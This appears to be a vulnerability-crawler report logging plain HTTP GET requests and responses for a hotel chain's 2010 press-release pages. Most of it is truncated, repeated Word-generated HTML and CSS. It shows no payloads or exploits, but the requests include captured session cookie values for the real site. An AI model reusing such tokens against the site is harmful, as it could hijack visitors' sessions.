mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}p.p12, li.p12, div.p12 {mso-style-name:p12; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MarlieseEngel {mso-style-name:"Marliese Engel"; mso-style-noshow:yes; mso-ansi-font-size:11.0pt; mso-bidi-font-size:11.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black; font-weight:normal; font-style:normal; text-decoration:none; text-underline:none; text-decoration:none; text-line-through:none;}ins {mso-style-type:export-only; text-decoration:none;}span.msoIns {mso-style-type:export-only; mso-style-name:""; font-style:italic; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:762846213; mso-list-type:hybrid; mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l11 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l12 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l13 {mso-list-id:1790010336; mso-list-type:hybrid; mso-list-template-ids:785780870 -1665504024 197641 328713 66569 197641 328713 66569 197641 328713;}@list l13:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:-; mso-level-ta..
- /pdfs/press/html/Wine-Water-Seafood-0609/index.html

/pdfs/press/html/Wine-Water-Seafood-0609/index.html

http://www.kimptonhotels.com/pdfs/press/html/Wine-Water-Seafood-0609/index.html

Request

GET /pdfs/press/html/Wine-Water-Seafood-0609/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 43884
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><link rel=OLE-Object-Data href="images/oledata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>1</o:TotalTime> <o:LastPrinted>2009-06-08T19:41:00Z</o:LastPrinted> <o:Created>2009-06-08T19:42:00Z</o:Created> <o:LastSaved>2009-06-08T19:42:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>1224</o:Words> <o:Characters>6981</o:Characters> <o:Lines>58</o:Lines> <o:Paragraphs>13</o:Paragraphs> <o:CharactersWithSpaces>8573</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:DontDisplayPageBoundaries/> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}p.p12, li.p12, div.p12 {mso-style-name:p12; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}span.MarlieseEngel {mso-style-name:"Marliese Engel"; mso-style-noshow:yes; mso-ansi-font-size:11.0pt; mso-bidi-font-size:11.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black; font-weight:normal; font-style:normal; text-decoration:none; text-underline:none; text-decoration:none; text-line-through:none;}ins {mso-style-type:export-only; text-decoration:none;}span.msoIns {mso-style-type:export-only; mso-style-name:""; font-style:italic; color:black;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:762846213; mso-list-type:hybrid; mso-list-template-ids:737695120 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l11 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l12 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l13 {mso-list-id:1790010336; mso-list-type:hybrid; mso-list-template-ids:785780870 -1665504024 197641 328713 66569 197641 328713 66569 197641 328713;}@list l13:level1 {mso-level-start-at:0; mso-level-number-format:bullet; mso-level-text:-; mso-level-ta..
- /pdfs/press/html/Green-Meetings-0409/

/pdfs/press/html/Green-Meetings-0409/

http://www.kimptonhotels.com/pdfs/press/html/Green-Meetings-0409/

Request

GET /pdfs/press/html/Green-Meetings-0409/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Green-Meetings-0409/index.html
